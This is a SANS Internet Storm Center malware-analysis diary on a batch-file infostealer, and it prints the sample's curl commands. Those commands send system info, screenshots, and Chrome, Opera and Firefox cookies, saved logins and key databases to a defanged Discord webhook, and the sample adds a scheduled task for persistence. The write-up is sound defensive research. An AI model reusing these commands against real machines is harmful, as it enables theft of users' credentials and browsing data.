Threat Level: green Handler on Duty: Yee Ching Tok

SANS ISC: Infostealer in a Batch File - SANS Internet Storm Center SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network
https://isc.sans.edu/honeypot.html

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Infostealer in a Batch File

It’s pretty common to see malicious content delivered as email attachments. Every day, my mailboxes are flooded with malicious content... which is great from a research point of view. Am I the only one to be happy when I see my catch-all mailboxes full of junk?

A few days ago, one of our readers (thanks Ron!) shared an nice piece of malicious code. This one was interesting to share with our community because it was a simple batch file (.bat). Yes, even batch file can be malicious! From an attacker’s perspective, it’s an interesting approach because it is, basically, a text file. Even more, the sample started with a very low VirusTotal score: 2/56 and today it reached 12/56! (sha256: a21f2e8e5861dbc232e4c6934edbf9fa355575d1e5839f7596a297b5737473c8)[1]

The file targets Windows 10 operating systems because it relies on curl.exe to install extra tools to collect interesting data and exfiltrate them. Curl has been added to Windows 10 since the built 1763[2]. Curl is a powerful tool that has many features often not know[3]

Let’s have a look at the script. It contains a lot of junk code but it seems not used because it starts with the following lines:

@echo off
cd .
goto temp

This label is located far beyond in the code.

The data exfiltration is performed via Discord webhook, very common these days:

set "webhook=hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm"

As I said, the script makes an intensive use of curl.exe. Here are the commands executed. 

Basic info about the victim’s computer are exported:

curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```[Report from REM - 172.16.74.20]\nLocal time: 16:17```\"}"  hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm

Then, the script downloads a tool to take a screenshot and exfiltrate the PNG file:

curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Screenshot @ 16:17```\"}"  hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent -L --fail "hxxps://github[.]com/chuntaro/screenshot-cmd/blob/master/screenshot.exe?raw=true" -o s.exe
curl --silent --output /dev/null -F ss=@"C:\Users\Public\Documents\s.png" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm

More info is gathered from the OS (stored in a temp file "sysinfo.txt") and sent to Discord:

curl --silent --output /dev/null -F systeminfo=@"C:\Users\REM\AppData\Roaming\sysinfo.txt" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm

Chrome files are collected and exfiltrated:

curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- CHROME -```\"}"  hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F c=@"C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Cookies" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F h=@"C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\History" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F s=@"C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Shortcuts" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F b=@"C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F l=@"C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Login Data" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F l=@"C:\Users\REM\AppData\Local\Google\Chrome\User Data\Local State" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm

Same for Opera:

curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- OPERA -```\"}"  hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F c=@"C:\Users\REM\AppData\Roaming\Opera Software\Opera Stable\Cookies" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F h=@"C:\Users\REM\AppData\Roaming\Opera Software\Opera Stable\History" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F s=@"C:\Users\REM\AppData\Roaming\Opera Software\Opera Stable\Shortcuts" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F b=@"C:\Users\REM\AppData\Roaming\Opera Software\Opera Stable\Bookmarks" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F l=@"C:\Users\REM\AppData\Roaming\Opera Software\Opera Stable\Login Data" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm

And, finally, Firefox:

curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- FIREFOX -```\"}"  hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\6ukz553v.default-release\logins.json" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\6ukz553v.default-release\key3.db" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\6ukz553v.default-release\key4.db" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\6ukz553v.default-release\cookies.sqlite" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\me64g8nk.default\logins.json" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\me64g8nk.default\key3.db" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\me64g8nk.default\key4.db" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\me64g8nk.default\cookies.sqlite" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm

At the end, a new .bat file is generated and added as a scheduled task for persistence and exfiltrate data at regular intervals:

curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Batch Scheduled: true, Daily\n[End of report]```\"}"  hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm

There are the application that were detected in my lab but, when I checked the code, I found support for the following tools:

  • Vivaldi
  • osu!
  • Discord
  • Steam
  • Minecraft
  • Growtopia

Between the multiple invocations of curl.exe, the script verify the precense of the tools and prepate the information to exfiltrate. A good example that demonstrates that even simple batch script can be dangerous!

[1] https://www.virustotal.com/gui/file/a21f2e8e5861dbc232e4c6934edbf9fa355575d1e5839f7596a297b5737473c8
[2] https://techcommunity.microsoft.com/t5/containers/tar-and-curl-come-to-windows/ba-p/382409
[3] https://isc.sans.edu/forums/diary/Exploiting+the+Power+of+Curl/23934

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

I will be teaching next: Reverse-Engineering Malware: Malware Analysis Tools and Techniques - SANS London June 2022

Xme

687 Posts
ISC Handler
Mar 9th 2022

Sign Up for Free or Log In to start participating in the conversation!